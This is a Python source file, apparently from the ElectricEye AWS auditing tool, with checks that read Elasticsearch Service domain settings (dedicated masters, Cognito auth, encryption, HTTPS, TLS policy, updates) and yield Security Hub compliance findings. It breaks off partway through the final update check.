# loop through elasticsearch domains
def list_domain_names(cache):
    """Return the Elasticsearch ListDomainNames response, memoized in *cache*."""
    cached = cache.get("list_domain_names")
    if not cached:
        # cache miss: fetch once and remember for subsequent checks
        cached = elasticsearch.list_domain_names()
        cache["list_domain_names"] = cached
    return cached
@registry.register_check("es")
def dedicated_master_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[Elasticsearch.1] Elasticsearch Service domains should use dedicated master nodes

    For every domain in the account/region, yields a FAILED (LOW) Security Hub
    finding when ElasticsearchClusterConfig.DedicatedMasterEnabled is false and
    a PASSED (INFORMATIONAL) finding otherwise.
    """
    response = list_domain_names(cache)
    myDomainNames = response["DomainNames"]
    for domains in myDomainNames:
        esDomainName = str(domains["DomainName"])
        response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
        esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
        domainId = str(response["DomainStatus"]["DomainId"])
        domainArn = str(response["DomainStatus"]["ARN"])
        # boolean is stringified so it can be compared against "False" below
        dedicatedMasterCheck = str(
            response["DomainStatus"]["ElasticsearchClusterConfig"]["DedicatedMasterEnabled"]
        )
        # ISO Time
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        if dedicatedMasterCheck == "False":
            # failing finding: domain has no dedicated master nodes
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": domainArn + "/elasticsearch-dedicated-master-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": domainArn,
                "AwsAccountId": awsAccountId,
                "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "LOW"},
                "Confidence": 99,
                "Title": "[Elasticsearch.1] Elasticsearch Service domains should use dedicated master nodes",
                "Description": "Elasticsearch Service domain "
                + esDomainName
                + " does not use dedicated master nodes. Refer to the remediation instructions if this configuration is not intended",
                "Remediation": {
                    "Recommendation": {
                        "Text": "If your domain should dedicated master nodes enabled refer to the Configuring Amazon ES Domains section of the Amazon Elasticsearch Service Developer Guide",
                        "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomains-configure-cluster",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsElasticSearchDomain",
                        "Id": domainArn,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {
                            "AwsElasticSearchDomain": {
                                "DomainId": domainId,
                                "DomainName": esDomainName,
                                "ElasticsearchVersion": esVersion,
                            }
                        },
                    }
                ],
                "Compliance": {
                    "Status": "FAILED",
                    "RelatedRequirements": [
                        "NIST CSF ID.BE-5",
                        "NIST CSF PR.PT-5",
                        "NIST SP 800-53 CP-2",
                        "NIST SP 800-53 CP-11",
                        "NIST SP 800-53 SA-13",
                        "NIST SP 800-53 SA14",
                        "AICPA TSC CC3.1",
                        "AICPA TSC A1.2",
                        "ISO 27001:2013 A.11.1.4",
                        "ISO 27001:2013 A.17.1.1",
                        "ISO 27001:2013 A.17.1.2",
                        "ISO 27001:2013 A.17.2.1",
                    ],
                },
                "Workflow": {"Status": "NEW"},
                "RecordState": "ACTIVE",
            }
            yield finding
        else:
            # passing finding: same payload with PASSED/RESOLVED/ARCHIVED state
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": domainArn + "/elasticsearch-dedicated-master-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": domainArn,
                "AwsAccountId": awsAccountId,
                "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "INFORMATIONAL"},
                "Confidence": 99,
                "Title": "[Elasticsearch.1] Elasticsearch Service domains should use dedicated master nodes",
                "Description": "Elasticsearch Service domain "
                + esDomainName
                + " uses dedicated master nodes.",
                "Remediation": {
                    "Recommendation": {
                        "Text": "If your domain should dedicated master nodes enabled refer to the Configuring Amazon ES Domains section of the Amazon Elasticsearch Service Developer Guide",
                        "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomains-configure-cluster",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsElasticSearchDomain",
                        "Id": domainArn,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {
                            "AwsElasticSearchDomain": {
                                "DomainId": domainId,
                                "DomainName": esDomainName,
                                "ElasticsearchVersion": esVersion,
                            }
                        },
                    }
                ],
                "Compliance": {
                    "Status": "PASSED",
                    "RelatedRequirements": [
                        "NIST CSF ID.BE-5",
                        "NIST CSF PR.PT-5",
                        "NIST SP 800-53 CP-2",
                        "NIST SP 800-53 CP-11",
                        "NIST SP 800-53 SA-13",
                        "NIST SP 800-53 SA14",
                        "AICPA TSC CC3.1",
                        "AICPA TSC A1.2",
                        "ISO 27001:2013 A.11.1.4",
                        "ISO 27001:2013 A.17.1.1",
                        "ISO 27001:2013 A.17.1.2",
                        "ISO 27001:2013 A.17.2.1",
                    ],
                },
                "Workflow": {"Status": "RESOLVED"},
                "RecordState": "ARCHIVED",
            }
            yield finding
@registry.register_check("es")
def cognito_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[Elasticsearch.2] Elasticsearch Service domains should use Cognito authentication for Kibana

    For every domain in the account/region, yields a FAILED (MEDIUM) Security
    Hub finding when Cognito authentication for Kibana is not enabled and a
    PASSED (INFORMATIONAL) finding otherwise.
    """
    response = list_domain_names(cache)
    myDomainNames = response["DomainNames"]
    for domains in myDomainNames:
        esDomainName = str(domains["DomainName"])
        response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
        esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
        domainId = str(response["DomainStatus"]["DomainId"])
        domainArn = str(response["DomainStatus"]["ARN"])
        try:
            cognitoEnabledCheck = str(response["DomainStatus"]["CognitoOptions"]["Enabled"])
        except KeyError:
            # CognitoOptions is absent when Cognito auth was never configured;
            # catching only KeyError keeps other errors from being masked
            cognitoEnabledCheck = "False"
        # ISO Time
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        if cognitoEnabledCheck == "False":
            # failing finding: Kibana is not protected by Cognito auth
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": domainArn + "/elasticsearch-cognito-auth-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": domainArn,
                "AwsAccountId": awsAccountId,
                "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "MEDIUM"},
                "Confidence": 99,
                "Title": "[Elasticsearch.2] Elasticsearch Service domains should use Cognito authentication for Kibana",
                "Description": "Elasticsearch Service domain "
                + esDomainName
                + " does not use Cognito authentication for Kibana. Refer to the remediation instructions if this configuration is not intended",
                "Remediation": {
                    "Recommendation": {
                        "Text": "If your domain should use Cognito authentication for Kibana refer to the Amazon Cognito Authentication for Kibana section of the Amazon Elasticsearch Service Developer Guide",
                        "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsElasticSearchDomain",
                        "Id": domainArn,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {
                            "AwsElasticSearchDomain": {
                                "DomainId": domainId,
                                "DomainName": esDomainName,
                                "ElasticsearchVersion": esVersion,
                            }
                        },
                    }
                ],
                "Compliance": {
                    "Status": "FAILED",
                    "RelatedRequirements": [
                        "NIST CSF PR.AC-6",
                        "NIST SP 800-53 AC-1",
                        "NIST SP 800-53 AC-2",
                        "NIST SP 800-53 AC-3",
                        "NIST SP 800-53 AC-16",
                        "NIST SP 800-53 AC-19",
                        "NIST SP 800-53 AC-24",
                        "NIST SP 800-53 IA-1",
                        "NIST SP 800-53 IA-2",
                        "NIST SP 800-53 IA-4",
                        "NIST SP 800-53 IA-5",
                        "NIST SP 800-53 IA-8",
                        "NIST SP 800-53 PE-2",
                        "NIST SP 800-53 PS-3",
                        "AICPA TSC CC6.1",
                        "ISO 27001:2013 A.7.1.1",
                        "ISO 27001:2013 A.9.2.1",
                    ],
                },
                "Workflow": {"Status": "NEW"},
                "RecordState": "ACTIVE",
            }
            yield finding
        else:
            # passing finding: same payload with PASSED/RESOLVED/ARCHIVED state
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": domainArn + "/elasticsearch-cognito-auth-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": domainArn,
                "AwsAccountId": awsAccountId,
                "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "INFORMATIONAL"},
                "Confidence": 99,
                "Title": "[Elasticsearch.2] Elasticsearch Service domains should use Cognito authentication for Kibana",
                "Description": "Elasticsearch Service domain "
                + esDomainName
                + " uses Cognito authentication for Kibana.",
                "Remediation": {
                    "Recommendation": {
                        "Text": "If your domain should use Cognito authentication for Kibana refer to the Amazon Cognito Authentication for Kibana section of the Amazon Elasticsearch Service Developer Guide",
                        "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsElasticSearchDomain",
                        "Id": domainArn,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {
                            "AwsElasticSearchDomain": {
                                "DomainId": domainId,
                                "DomainName": esDomainName,
                                "ElasticsearchVersion": esVersion,
                            }
                        },
                    }
                ],
                "Compliance": {
                    "Status": "PASSED",
                    "RelatedRequirements": [
                        "NIST CSF PR.AC-6",
                        "NIST SP 800-53 AC-1",
                        "NIST SP 800-53 AC-2",
                        "NIST SP 800-53 AC-3",
                        "NIST SP 800-53 AC-16",
                        "NIST SP 800-53 AC-19",
                        "NIST SP 800-53 AC-24",
                        "NIST SP 800-53 IA-1",
                        "NIST SP 800-53 IA-2",
                        "NIST SP 800-53 IA-4",
                        "NIST SP 800-53 IA-5",
                        "NIST SP 800-53 IA-8",
                        "NIST SP 800-53 PE-2",
                        "NIST SP 800-53 PS-3",
                        "AICPA TSC CC6.1",
                        "ISO 27001:2013 A.7.1.1",
                        "ISO 27001:2013 A.9.2.1",
                    ],
                },
                "Workflow": {"Status": "RESOLVED"},
                "RecordState": "ARCHIVED",
            }
            yield finding
@registry.register_check("es")
def encryption_at_rest_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[Elasticsearch.3] Elasticsearch Service domains should be encrypted at rest

    For every domain in the account/region, yields a FAILED (HIGH) Security Hub
    finding when EncryptionAtRestOptions.Enabled is false and a PASSED
    (INFORMATIONAL) finding otherwise.
    """
    response = list_domain_names(cache)
    myDomainNames = response["DomainNames"]
    for domains in myDomainNames:
        esDomainName = str(domains["DomainName"])
        response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
        esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
        domainId = str(response["DomainStatus"]["DomainId"])
        domainArn = str(response["DomainStatus"]["ARN"])
        # boolean is stringified so it can be compared against "False" below
        encryptionAtRestCheck = str(response["DomainStatus"]["EncryptionAtRestOptions"]["Enabled"])
        # ISO Time
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        if encryptionAtRestCheck == "False":
            # failing finding: domain data is not encrypted at rest
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": domainArn + "/elasticsearch-encryption-at-rest-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": domainArn,
                "AwsAccountId": awsAccountId,
                "Types": [
                    "Software and Configuration Checks/AWS Security Best Practices",
                    "Effects/Data Exposure",
                ],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "HIGH"},
                "Confidence": 99,
                "Title": "[Elasticsearch.3] Elasticsearch Service domains should be encrypted at rest",
                "Description": "Elasticsearch Service domain "
                + esDomainName
                + " is not encrypted at rest. You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 5.1 or later",
                "Remediation": {
                    "Recommendation": {
                        "Text": "You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 5.1 or later.",
                        "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/encryption-at-rest.html#enabling-ear",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsElasticSearchDomain",
                        "Id": domainArn,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {
                            "AwsElasticSearchDomain": {
                                "DomainId": domainId,
                                "DomainName": esDomainName,
                                "ElasticsearchVersion": esVersion,
                                "EncryptionAtRestOptions": {"Enabled": False},
                            }
                        },
                    }
                ],
                "Compliance": {
                    "Status": "FAILED",
                    "RelatedRequirements": [
                        "NIST CSF PR.DS-1",
                        "NIST SP 800-53 MP-8",
                        "NIST SP 800-53 SC-12",
                        "NIST SP 800-53 SC-28",
                        "AICPA TSC CC6.1",
                        "ISO 27001:2013 A.8.2.3",
                    ],
                },
                "Workflow": {"Status": "NEW"},
                "RecordState": "ACTIVE",
            }
            yield finding
        else:
            # passing finding: same payload with PASSED/RESOLVED/ARCHIVED state
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": domainArn + "/elasticsearch-encryption-at-rest-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": domainArn,
                "AwsAccountId": awsAccountId,
                "Types": [
                    "Software and Configuration Checks/AWS Security Best Practices",
                    "Effects/Data Exposure",
                ],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "INFORMATIONAL"},
                "Confidence": 99,
                "Title": "[Elasticsearch.3] Elasticsearch Service domains should be encrypted at rest",
                "Description": "Elasticsearch Service domain "
                + esDomainName
                + " is encrypted at rest",
                "Remediation": {
                    "Recommendation": {
                        "Text": "You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 5.1 or later.",
                        "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/encryption-at-rest.html#enabling-ear",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsElasticSearchDomain",
                        "Id": domainArn,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {
                            "AwsElasticSearchDomain": {
                                "DomainId": domainId,
                                "DomainName": esDomainName,
                                "ElasticsearchVersion": esVersion,
                                "EncryptionAtRestOptions": {"Enabled": True},
                            }
                        },
                    }
                ],
                "Compliance": {
                    "Status": "PASSED",
                    "RelatedRequirements": [
                        "NIST CSF PR.DS-1",
                        "NIST SP 800-53 MP-8",
                        "NIST SP 800-53 SC-12",
                        "NIST SP 800-53 SC-28",
                        "AICPA TSC CC6.1",
                        "ISO 27001:2013 A.8.2.3",
                    ],
                },
                "Workflow": {"Status": "RESOLVED"},
                "RecordState": "ARCHIVED",
            }
            yield finding
@registry.register_check("es")
def node2node_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[Elasticsearch.4] Elasticsearch Service domains should use node-to-node encryption

    For every domain in the account/region, yields a FAILED (HIGH) Security Hub
    finding when NodeToNodeEncryptionOptions.Enabled is false and a PASSED
    (INFORMATIONAL) finding otherwise.
    """
    response = list_domain_names(cache)
    myDomainNames = response["DomainNames"]
    for domains in myDomainNames:
        esDomainName = str(domains["DomainName"])
        response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
        esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
        domainId = str(response["DomainStatus"]["DomainId"])
        domainArn = str(response["DomainStatus"]["ARN"])
        # boolean is stringified so it can be compared against "False" below
        node2nodeEncryptionCheck = str(
            response["DomainStatus"]["NodeToNodeEncryptionOptions"]["Enabled"]
        )
        # ISO Time
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        if node2nodeEncryptionCheck == "False":
            # failing finding: traffic between nodes is not encrypted
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": domainArn + "/elasticsearch-node2node-encryption-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": domainArn,
                "AwsAccountId": awsAccountId,
                "Types": [
                    "Software and Configuration Checks/AWS Security Best Practices",
                    "Effects/Data Exposure",
                ],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "HIGH"},
                "Confidence": 99,
                "Title": "[Elasticsearch.4] Elasticsearch Service domains should use node-to-node encryption",
                "Description": "Elasticsearch Service domain "
                + esDomainName
                + " does not use node-to-node encryption. You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 6.0 or later",
                "Remediation": {
                    "Recommendation": {
                        "Text": "You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 6.0 or later.",
                        "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/ntn.html",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsElasticSearchDomain",
                        "Id": domainArn,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {
                            "AwsElasticSearchDomain": {
                                "DomainId": domainId,
                                "DomainName": esDomainName,
                                "ElasticsearchVersion": esVersion,
                                "NodeToNodeEncryptionOptions": {"Enabled": False},
                            }
                        },
                    }
                ],
                "Compliance": {
                    "Status": "FAILED",
                    "RelatedRequirements": [
                        "NIST CSF PR.DS-2",
                        "NIST SP 800-53 SC-8",
                        "NIST SP 800-53 SC-11",
                        "NIST SP 800-53 SC-12",
                        "AICPA TSC CC6.1",
                        "ISO 27001:2013 A.8.2.3",
                        "ISO 27001:2013 A.13.1.1",
                        "ISO 27001:2013 A.13.2.1",
                        "ISO 27001:2013 A.13.2.3",
                        "ISO 27001:2013 A.14.1.2",
                        "ISO 27001:2013 A.14.1.3",
                    ],
                },
                "Workflow": {"Status": "NEW"},
                "RecordState": "ACTIVE",
            }
            yield finding
        else:
            # passing finding: same payload with PASSED/RESOLVED/ARCHIVED state
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": domainArn + "/elasticsearch-node2node-encryption-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": domainArn,
                "AwsAccountId": awsAccountId,
                "Types": [
                    "Software and Configuration Checks/AWS Security Best Practices",
                    "Effects/Data Exposure",
                ],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "INFORMATIONAL"},
                "Confidence": 99,
                "Title": "[Elasticsearch.4] Elasticsearch Service domains should use node-to-node encryption",
                "Description": "Elasticsearch Service domain "
                + esDomainName
                + " uses node-to-node encryption.",
                "Remediation": {
                    "Recommendation": {
                        "Text": "You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 6.0 or later.",
                        "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/ntn.html",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsElasticSearchDomain",
                        "Id": domainArn,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {
                            "AwsElasticSearchDomain": {
                                "DomainId": domainId,
                                "DomainName": esDomainName,
                                "ElasticsearchVersion": esVersion,
                                "NodeToNodeEncryptionOptions": {"Enabled": True},
                            }
                        },
                    }
                ],
                "Compliance": {
                    "Status": "PASSED",
                    "RelatedRequirements": [
                        "NIST CSF PR.DS-2",
                        "NIST SP 800-53 SC-8",
                        "NIST SP 800-53 SC-11",
                        "NIST SP 800-53 SC-12",
                        "AICPA TSC CC6.1",
                        "ISO 27001:2013 A.8.2.3",
                        "ISO 27001:2013 A.13.1.1",
                        "ISO 27001:2013 A.13.2.1",
                        "ISO 27001:2013 A.13.2.3",
                        "ISO 27001:2013 A.14.1.2",
                        "ISO 27001:2013 A.14.1.3",
                    ],
                },
                "Workflow": {"Status": "RESOLVED"},
                "RecordState": "ARCHIVED",
            }
            yield finding
@registry.register_check("es")
def https_enforcement_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[Elasticsearch.5] Elasticsearch Service domains should enforce HTTPS-only communications"""
    for domain in list_domain_names(cache)["DomainNames"]:
        esDomainName = str(domain["DomainName"])
        domainDetail = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
        domainStatus = domainDetail["DomainStatus"]
        esVersion = str(domainStatus["ElasticsearchVersion"])
        domainId = str(domainStatus["DomainId"])
        domainArn = str(domainStatus["ARN"])
        # The API value is stringified; anything other than "False" counts as passing,
        # mirroring the original `== "False"` failing-branch test
        httpsEnforced = str(domainStatus["DomainEndpointOptions"]["EnforceHTTPS"]) != "False"
        # ISO 8601 timestamp shared by all of the finding's date fields
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        if httpsEnforced:
            severityLabel = "INFORMATIONAL"
            complianceStatus = "PASSED"
            workflowStatus = "RESOLVED"
            recordState = "ARCHIVED"
            description = (
                "Elasticsearch Service domain "
                + esDomainName
                + " enforces HTTPS-only communications. Refer to the remediation instructions if this configuration is not intended"
            )
        else:
            severityLabel = "HIGH"
            complianceStatus = "FAILED"
            workflowStatus = "NEW"
            recordState = "ACTIVE"
            description = (
                "Elasticsearch Service domain "
                + esDomainName
                + " does not enforce HTTPS-only communications. Refer to the remediation instructions if this configuration is not intended"
            )
        # Single finding skeleton; only the branch-dependent fields above vary
        yield {
            "SchemaVersion": "2018-10-08",
            "Id": domainArn + "/elasticsearch-enforce-https-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            "GeneratorId": domainArn,
            "AwsAccountId": awsAccountId,
            "Types": [
                "Software and Configuration Checks/AWS Security Best Practices",
                "Effects/Data Exposure",
            ],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": severityLabel},
            "Confidence": 99,
            "Title": "[Elasticsearch.5] Elasticsearch Service domains should enforce HTTPS-only communications",
            "Description": description,
            "Remediation": {
                "Recommendation": {
                    "Text": "If your domain should enforce HTTPS-only communications refer to the About Configuration Changes section of the Amazon Elasticsearch Service Developer Guide",
                    "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-configuration-changes",
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsElasticSearchDomain",
                    "Id": domainArn,
                    "Partition": awsPartition,
                    "Region": awsRegion,
                    "Details": {
                        "AwsElasticSearchDomain": {
                            "DomainId": domainId,
                            "DomainName": esDomainName,
                            "ElasticsearchVersion": esVersion,
                            "DomainEndpointOptions": {"EnforceHTTPS": httpsEnforced},
                        }
                    },
                }
            ],
            "Compliance": {
                "Status": complianceStatus,
                "RelatedRequirements": [
                    "NIST CSF PR.DS-2",
                    "NIST SP 800-53 SC-8",
                    "NIST SP 800-53 SC-11",
                    "NIST SP 800-53 SC-12",
                    "AICPA TSC CC6.1",
                    "ISO 27001:2013 A.8.2.3",
                    "ISO 27001:2013 A.13.1.1",
                    "ISO 27001:2013 A.13.2.1",
                    "ISO 27001:2013 A.13.2.3",
                    "ISO 27001:2013 A.14.1.2",
                    "ISO 27001:2013 A.14.1.3",
                ],
            },
            "Workflow": {"Status": workflowStatus},
            "RecordState": recordState,
        }
@registry.register_check("es")
def tls_policy_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[Elasticsearch.6] Elasticsearch Service domains that enforce HTTPS-only communications should use a TLS 1.2 security policy"""
    for domain in list_domain_names(cache)["DomainNames"]:
        esDomainName = str(domain["DomainName"])
        domainDetail = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
        domainStatus = domainDetail["DomainStatus"]
        esVersion = str(domainStatus["ElasticsearchVersion"])
        domainId = str(domainStatus["DomainId"])
        domainArn = str(domainStatus["ARN"])
        endpointOptions = domainStatus["DomainEndpointOptions"]
        # Guard clause: domains that do not enforce HTTPS are out of scope for
        # this check (the original used an empty `else: pass`)
        if str(endpointOptions["EnforceHTTPS"]) != "True":
            continue
        # ISO 8601 timestamp for the finding's date fields
        iso8601Time = (
            datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        )
        tlsPolicy = str(endpointOptions["TLSSecurityPolicy"])
        usesTls12 = tlsPolicy == "Policy-Min-TLS-1-2-2019-07"
        if usesTls12:
            severityLabel = "INFORMATIONAL"
            complianceStatus = "PASSED"
            workflowStatus = "RESOLVED"
            recordState = "ARCHIVED"
            description = (
                "Elasticsearch Service domain "
                + esDomainName
                + " uses a TLS 1.2 security policy."
            )
        else:
            severityLabel = "HIGH"
            complianceStatus = "FAILED"
            workflowStatus = "NEW"
            recordState = "ACTIVE"
            description = (
                "Elasticsearch Service domain "
                + esDomainName
                + " does not use a TLS 1.2 security policy. Refer to the remediation instructions if this configuration is not intended"
            )
        # Single finding skeleton; only the branch-dependent fields above vary
        yield {
            "SchemaVersion": "2018-10-08",
            "Id": domainArn + "/elasticsearch-tls-1-2-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            "GeneratorId": domainArn,
            "AwsAccountId": awsAccountId,
            "Types": [
                "Software and Configuration Checks/AWS Security Best Practices",
                "Effects/Data Exposure",
            ],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": severityLabel},
            "Confidence": 99,
            "Title": "[Elasticsearch.6] Elasticsearch Service domains that enforce HTTPS-only communications should use a TLS 1.2 security policy",
            "Description": description,
            "Remediation": {
                "Recommendation": {
                    "Text": "If your domain should use a TLS 1.2 security policy refer to the About Configuration Changes section of the Amazon Elasticsearch Service Developer Guide",
                    "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-configuration-changes",
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsElasticSearchDomain",
                    "Id": domainArn,
                    "Partition": awsPartition,
                    "Region": awsRegion,
                    "Details": {
                        "AwsElasticSearchDomain": {
                            "DomainId": domainId,
                            "DomainName": esDomainName,
                            "ElasticsearchVersion": esVersion,
                            "DomainEndpointOptions": {
                                "EnforceHTTPS": True,
                                "TLSSecurityPolicy": tlsPolicy,
                            },
                        }
                    },
                }
            ],
            "Compliance": {
                "Status": complianceStatus,
                "RelatedRequirements": [
                    "NIST CSF PR.DS-2",
                    "NIST SP 800-53 SC-8",
                    "NIST SP 800-53 SC-11",
                    "NIST SP 800-53 SC-12",
                    "AICPA TSC CC6.1",
                    "ISO 27001:2013 A.8.2.3",
                    "ISO 27001:2013 A.13.1.1",
                    "ISO 27001:2013 A.13.2.1",
                    "ISO 27001:2013 A.13.2.3",
                    "ISO 27001:2013 A.14.1.2",
                    "ISO 27001:2013 A.14.1.3",
                ],
            },
            "Workflow": {"Status": workflowStatus},
            "RecordState": recordState,
        }
@registry.register_check("es")
def elastic_update_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[Elasticsearch.7] Elasticsearch Service domains should be updated to the latest service software version"""
    for domain in list_domain_names(cache)["DomainNames"]:
        esDomainName = str(domain["DomainName"])
        domainDetail = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
        domainStatus = domainDetail["DomainStatus"]
        esVersion = str(domainStatus["ElasticsearchVersion"])
        domainId = str(domainStatus["DomainId"])
        domainArn = str(domainStatus["ARN"])
        softwareOptions = domainStatus["ServiceSoftwareOptions"]
        # Stringified boolean from the API, as in the original comparison
        updateAvailable = str(softwareOptions["UpdateAvailable"]) == "True"
        updateInformation = str(softwareOptions["Description"])
        # ISO 8601 timestamp shared by all of the finding's date fields
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        if updateAvailable:
            # A service software update is pending -> failing, low-severity finding
            severityLabel = "LOW"
            complianceStatus = "FAILED"
            workflowStatus = "NEW"
            recordState = "ACTIVE"
            description = (
                "Elasticsearch Service domain "
                + esDomainName
                + " is not up to date. Service provided message follows: "
                + updateInformation
                + ". Refer to the remediation instructions if this configuration is not intended"
            )
        else:
